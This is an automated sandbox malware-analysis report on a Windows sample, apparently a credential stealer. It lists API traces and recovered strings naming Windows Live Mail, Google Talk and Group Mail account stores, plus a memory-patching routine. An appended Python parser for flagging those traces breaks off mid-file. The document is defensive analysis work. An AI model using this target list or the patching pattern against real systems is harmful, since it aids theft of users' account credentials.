                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                    • Opcode Fuzzy Hash: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID:
                                                                    • API String ID: 231171946-0
                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                    • free.MSVCRT ref: 0040B0FB
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B12C
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    • Opcode ID: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                    • Opcode Fuzzy Hash: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                    • malloc.MSVCRT ref: 00417407
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                    • free.MSVCRT ref: 00417425
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                    • Opcode Fuzzy Hash: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1961120804-0
                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:20%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:867
                                                                    Total number of Limit Nodes:21
                                                                    [Execution graph (867 nodes, 21 limit nodes): per-function nodes annotated with API-call counts and the call edges between them, rendered as an interactive graph in the original report; the raw node/edge dump is not reproduced here]

                                                                    Control-flow Graph
                                                                    • Function 004082CD-0040841A: memset ×4, GetComputerNameA, GetUserNameA, MultiByteToWideChar ×2, strlen ×2, memcpy (executed / not-executed graph rendering omitted)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040832F
                                                                    • memset.MSVCRT ref: 00408343
                                                                    • memset.MSVCRT ref: 0040835F
                                                                    • memset.MSVCRT ref: 00408376
                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                    • strlen.MSVCRT ref: 004083E9
                                                                    • strlen.MSVCRT ref: 004083F8
                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                    • String ID: 5$H$O$b$i$}$}
                                                                    • API String ID: 1832431107-3760989150
                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                    Control-flow Graph
                                                                    • Function 0044B49F (CRT entry path 00444C68-00444E0F): call 444e38, GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, call 40cf44, _cexit, exit (executed / not-executed graph rendering omitted)
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                    • String ID: h4ND$k{v
                                                                    • API String ID: 3662548030-3410959870
                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044430B
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                    • memset.MSVCRT ref: 00444379
                                                                    • memset.MSVCRT ref: 00444394
                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                    • strlen.MSVCRT ref: 004443DB
                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                    Strings
                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                    • Store Root, xrefs: 004443A5
                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                    • API String ID: 832325562-2578778931
                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                    Control-flow Graph
                                                                    • Function 0040F460-0040F6DF: memset ×2, call 4078ba ×2, RegOpenKeyExA, RegQueryValueExA ×2, call 40466b, call 404734, call 4047a5, call 4012ee, memcpy, LocalFree, RegCloseKey (executed / not-executed graph rendering omitted)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F567
                                                                    • memset.MSVCRT ref: 0040F57F
                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2012582556-3916222277
                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                    Control-flow Graph
                                                                    • Function 004034E4-00403582: memset ×2, call 410b1e, _mbscpy, call 406d55, _mbscat, call 4033f0 (executed / not-executed graph rendering omitted)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403504
                                                                    • memset.MSVCRT ref: 0040351A
                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                    • API String ID: 3071782539-966475738
                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                    Control-flow Graph
                                                                    • Function 0044B40E-0044B49F: GetModuleHandleA ×2, call 44b42b, GetProcAddress ×2, VirtualProtect ×2, call 44b49f (executed / not-executed graph rendering omitted)
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                    • memset.MSVCRT ref: 00408620
                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                    • memset.MSVCRT ref: 00408671
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                    Strings
                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                    • API String ID: 1366857005-1079885057
                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                    • String ID:
                                                                    • API String ID: 2152742572-0
                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
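The function listed above (GetProcAddress, VirtualProtect with flNewProtect 0x4 over 0x78 bytes, a second VirtualProtect over the same size, GetModuleHandleA, GetProcAddress) is the shape of a make-writable, patch, restore sequence combined with run-time API resolution. The following parser is an added example, not part of the Joe Sandbox report or of the sample: it reads API lines in the format this report uses, decodes the VirtualProtect protection constant, and flags that pattern. The sample input is the five lines from the listing above plus two lines in the "Part of subcall function" form used elsewhere in this report; the field names and the flagging rule are this example's own assumptions. Note that the sandbox prints more stack slots than the API actually takes, so only the first four VirtualProtect arguments are interpreted.

```python
import re
from typing import Any, Dict, List, Optional

# Constructed sample input: the five API lines of the function above, copied
# from the report, so the parser can be run offline.
SAMPLE_LINES = [
    "GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C",
    "VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E",
    "VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452",
    "GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460",
    "GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488",
]

# Page protection constants from winnt.h (PAGE_GUARD/PAGE_NOCACHE bits are masked off).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}

# One report line: optional subcall prefix, API.Module, optional argument list, "ref: <call site>".
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w?@$]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
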